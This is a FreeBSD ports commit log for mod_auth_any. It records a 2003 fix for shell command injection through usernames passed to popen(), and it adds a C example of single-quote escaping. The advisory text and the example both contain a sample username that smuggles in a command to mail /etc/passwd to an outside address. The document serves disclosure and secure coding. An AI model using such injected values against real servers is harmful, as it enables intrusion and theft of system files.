non port: www/mod_auth_any/files/bash_single_quote_escape_string.c

Number of commits found: 2

Mon, 6 Oct 2003
[ 13:00 edwin ]
[update orphaned port] www/mod_auth_any: Update to 1.3.2 and take maintainership

        - update to 1.3.2
        - update WWW
        - take maintainership

PR:             ports/57413
Submitted by:   Clement Laforet <sheepkiller@cultdeadsheep.org>

Tue, 25 Mar 2003
[ 04:23 lioux ]
o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding an escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:   Security Officer (nectar),
                Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:  mod_auth_any CVS [2],
                nalin@redhat.com [3]
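
The quoting fix described in the commit message above, as an added example: it is not the code in the port's files/bash_single_quote_escape_string.c or in mod_auth_any. The names `sq_escape` and `build_cmd`, the helper path and the sample password are assumptions; the username is the one quoted in the commit message.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper, not the port's bash_single_quote_escape_string.c:
 * return a malloc'd copy of s wrapped in single quotes, with every
 * embedded ' rewritten as '\'' so a POSIX shell reads one literal word. */
char *sq_escape(const char *s)
{
    size_t n = 2;                      /* opening and closing quote */
    for (const char *p = s; *p; p++)
        n += (*p == '\'') ? 4 : 1;
    char *out = malloc(n + 1), *q = out;
    if (!out) return NULL;
    *q++ = '\'';
    for (const char *p = s; *p; p++) {
        if (*p != '\'') { *q++ = *p; continue; }
        memcpy(q, "'\\''", 4);         /* close, escaped quote, reopen */
        q += 4;
    }
    *q++ = '\'';
    *q = '\0';
    return out;
}

/* Build the line that would go to popen(3); the caller frees it. */
char *build_cmd(const char *helper, const char *user, const char *pass)
{
    char *u = sq_escape(user), *p = sq_escape(pass), *cmd = NULL;
    if (u && p) {
        size_t len = strlen(helper) + strlen(u) + strlen(p) + 3;
        cmd = malloc(len);
        if (cmd)
            snprintf(cmd, len, "%s %s %s", helper, u, p);
    }
    free(u); free(p);
    return cmd;
}

int main(void)
{
    /* Username as quoted in the commit message; helper path and password are placeholders. */
    char *cmd = build_cmd("/path/to/helper", "foo&mail me@my.home</etc/passwd", "pa'ss");
    if (!cmd) return 1;
    puts(cmd);
    free(cmd);
    return 0;
}
```

Inside single quotes a POSIX shell treats every character literally, so `&` and `<` in the username reach the helper as data. Where the design allows it, running the helper with fork(2) and execv(3) instead of popen(3) avoids shell parsing altogether.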
